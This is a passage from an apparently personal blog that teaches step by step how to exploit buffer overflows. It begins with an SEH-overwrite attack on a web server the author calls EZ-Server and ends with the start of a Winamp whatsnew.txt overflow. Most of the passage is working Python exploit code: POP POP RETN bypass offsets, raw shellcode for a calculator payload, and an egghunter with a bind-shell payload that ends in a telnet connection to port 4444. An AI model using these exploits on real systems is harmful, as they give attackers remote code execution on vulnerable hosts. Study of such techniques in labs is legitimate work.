sock.send(sploit)
sock.close()

Restart Ez-server and reopen then attach into Ollydbg. Run your fuzzer, back into ollydbg make sure EIP was overwritten with 41414141.
If EIP was overwriten, now time for check module for bypass SEH protector. View->Exectuble Module. For short tutorial, I will select MSVCRTD.dll
Select and search POP POP RETN. In the register block, right click and select search for->sequence of command->POP r32 POP r32 RETN
If you found this command, means that the module is right for bypass SEH

copy thie module and check using msfpescan

msfpescan -i MSVCRTD.dll | grep DllCharacteristics
DllCharacteristics 0x0000000

0x0000000 means that this module not protected by SEH. Note the register of module to bypass SEH.
And edit fuzzer look like this

#!/usr/bin/python
import socket
head1 = "GET /"
head2 = "\r\n\r\n"+"HTTP/1.1"
buffer = "\x90" * 5879
buffer += "\xeb\x06\x90\x90"
buffer += "\x96\x96\x20\x10" #10209696 5B POP EBX alamat bypass SEH
buffer += "\x90" * (10000-len(buffer))
sploit = head1 + buffer + head2
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('192.168.56.102',8000))
sock.send(sploit)
sock.close()

Restart EZ-Server and attach into Ollydbg then run the fuzzer.
Check the value of SEH Cain. View->Seh cain. is right overwrite into MSVCRTD.dll module? if yes the fuzzer is correct.
Now, insert payload into fuzzer with short payload example Execute Command.

#!/usr/bin/python
import socket
head1 = "GET /"
head2 = "\r\n\r\n"+"HTTP/1.1"
buffer = "\x90" * 5879
buffer += "\xeb\x06\x90\x90"
buffer += "\x96\x96\x20\x10" #10209696 5B POP EBX
buffer += ("\x31\xc9\xd9\xce\xbb\x4c\xd3\x23\xc3\xb1\x23\xd9\x74\x24\xf4\x5f"
"\x83\xef\xfc\x31\x5f\x11\x03\x13\xc2\xc1\x36\x57\x0c\x41\xb9\xa7"
"\xcd\xc1\xfc\x9b\x46\xa9\xfb\x9b\x59\xbd\x8f\x14\x42\xca\xcf\x8a"
"\x73\x27\xa6\x41\x47\x3c\x38\xbb\x99\x82\xa2\xef\x5e\xc2\xa1\xe8"
"\x9f\x09\x44\xf7\xdd\x65\xa3\xcc\xb5\x5d\x48\x47\xd3\x15\x0f\x83"
"\x1a\xc1\xd6\x40\x10\x5e\x9c\x09\x35\x61\x49\x3e\x59\xea\x8c\xab"
"\xeb\xb0\xaa\x2f\x2f\x79\x73\x4b\x24\x3a\x43\x16\xfa\xc3\xaf\x93"
"\xbb\x3f\x3b\xd3\x27\xed\xb0\x7b\x50\x06\xcf\xf0\xe0\x68\xd0\x06"
"\xe1\x03\xb9\x3a\xbe\x22\xcc\x22\x16\xcc\xc8\x21\x56\xb5\x78\x4d"
"\x29\x92\x9b\xfe\xbd\xba\xa2\x8a\x30\xec\xa5\x6d\x2f\x73\x36\x12"
"\xb0")
buffer += "\x90" * (10000-len(buffer))
sploit = head1 + buffer + head2
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('192.168.56.102',8000))
sock.send(sploit)
sock.close()

IF calculator appear, it means that the payload was successfully executed. In this step we was successfully to embed payload into fuzzer. Next We will embed payload for bind shell.
Restart EZserver and edit your fuzer look like this :

#!/usr/bin/python
import socket
import os
import time
import sys

tip = "192.168.56.102"
tport = 8000

head1 = "GET /"
head2 = "\r\n\r\n"+"HTTP/1.1"
hunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
shellcode = ("\xb8\x1d\x77\xf6\x2c\xda\xca\x31\xc9\xb1\x51\xd9\x74\x24\xf4\x5a"
"\x31\x42\x12\x03\x42\x12\x83\xf7\x8b\x14\xd9\xfb\x1e\x32\x6f\xeb"
"\x26\x3b\x8f\x14\xb8\x4f\x1c\xce\x1d\xdb\x98\x32\xd5\xa7\x27\x32"
"\xe8\xb8\xa3\x8d\xf2\xcd\xeb\x31\x02\x39\x5a\xba\x30\x36\x5c\x52"
"\x09\x88\xc6\x06\xee\xc8\x8d\x51\x2e\x02\x60\x5c\x72\x78\x8f\x65"
"\x26\x5b\x58\xec\x23\x28\xc7\x2a\xad\xc4\x9e\xb9\xa1\x51\xd4\xe2"
"\xa5\x64\x01\x1f\xfa\xed\x5c\x73\x26\xee\x3f\x48\x17\xd5\xa4\xc5"
"\x1b\xd9\xaf\x99\x97\x92\xc0\x05\x05\x2f\x60\x3d\x0b\x58\xef\x73"
"\xbd\x74\xbf\x74\x17\xe2\x13\xec\xf0\xd8\xa1\x98\x77\x6c\xf4\x07"
"\x2c\x6d\x28\xdf\x07\x7c\x35\x24\xc8\x80\x10\x05\x61\x9b\xfb\x38"
"\x9c\x6c\x06\x6f\x35\x6f\xf9\x5f\xa1\xb6\x0c\xaa\x9f\x1e\xf0\x82"
"\xb3\xf3\x5d\x79\x67\xb7\x32\x3e\xd4\xc8\x65\xa6\xb2\x27\xda\x40"
"\x10\xc1\x03\x19\xfe\x75\xd9\x51\x38\x22\x21\x47\xac\xdd\x8c\x32"
"\xce\x0e\x46\x18\x9d\x81\x7e\x37\x21\x0b\xd3\xe2\x22\x64\xbc\xe9"
"\x94\x03\x74\xa6\xd9\xda\xd7\x1c\x72\xb6\x28\x4c\xe9\x50\x30\x15"
"\xc8\xd8\xe9\x1a\x02\x4f\xe9\x34\xcd\x1a\x71\xd2\x7a\xb8\x14\x93"
"\x9e\x54\xb7\xfa\x49\x65\xbe\x1b\xe3\x31\x48\x01\xc5\x79\xb9\x6f"
"\xd8\x38\x13\x91\x67\x91\xf8\xe0\x12\xd1\x55\x51\x49\x49\xd8\x5b"
"\x3d\x9c\xe3\xd6\x06\x5e\xcd\x43\xd0\xf2\xa3\x22\x8f\x98\x42\x95"
"\x7e\x08\x14\xea\x51\xda\x3b\xcd\x57\xd5\x17\x12\x81\x83\x68\x13"
"\x19\xab\x47\x60\x31\xaf\xeb\xb2\xda\xb0\x3a\x68\xdc\x9f\xab\xf2"
"\xfa\xc2\x5f\x59\x04\xd4\x5f\x8d") # size 344 byte
buffer = "\x90" * 5495 #5678 #5879 # offset 5883, karena masuk buffer JUMP SHORT maka dikurangi 4 byte
buffer += "w00tw00t"
buffer += shellcode
buffer += "\x90" * 32 #nops
buffer += "\xeb\x06\x90\x90"
buffer += "\x96\x96\x20\x10" # 10209696 alamat SEH ter-overwrite
buffer += hunter
buffer += "\x90" * (10004-len(buffer))
sploit = head1 + buffer + head2
print "[+] Connectiong to %s on port %d" % (tip,tport)
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((tip,tport))
print("[+] Sending PAYLOAD")
sock.send(sploit)
sock.close()
print("[+] Exploit send successfully")
print "[+] Waiting for 5 sec before spawning shell to " + tip + ":4444\r"
print "\r"
time.sleep(5)
os.system("telnet " + tip + " 4444")
print "[-] Connection lost from " + tip + ":4444 \r\n"
except:
print "[-] Could not connect to " + tip + ":4444\r\n"
sys.exit(0)

Run the fuzzer and look, we got the windows shell.
I'm sorry for not include screenshot for this post, because my internet connection is slow.

Monday, 1 October 2012

BOF Winamp

Posted by shinigami at 10:03

To make Winamp crash, you can use some method like making fuzzer for loadable file/configuration in winamp.
In this case, I will making fuzzer with modify whatsnew.txt file inside of Winamp directory.

#!/usr/bin/python
filename = "whatsnew.txt"
header = "Winamp 5.567"
start = "*"
buffer = "\x41" * 1337

sploit = header + start + buffer
file = open(filename,'w')
file.write(sploit)
file.close()

You can see that variable header contain string "Winamp 5.567", this is a header file of Whatnews.txt for options box when you select the version history.

Now, open your Winamp and attach into Ollydbg or Immunity Dbg.
And see, what happened in the memory? EIP was overwriten :D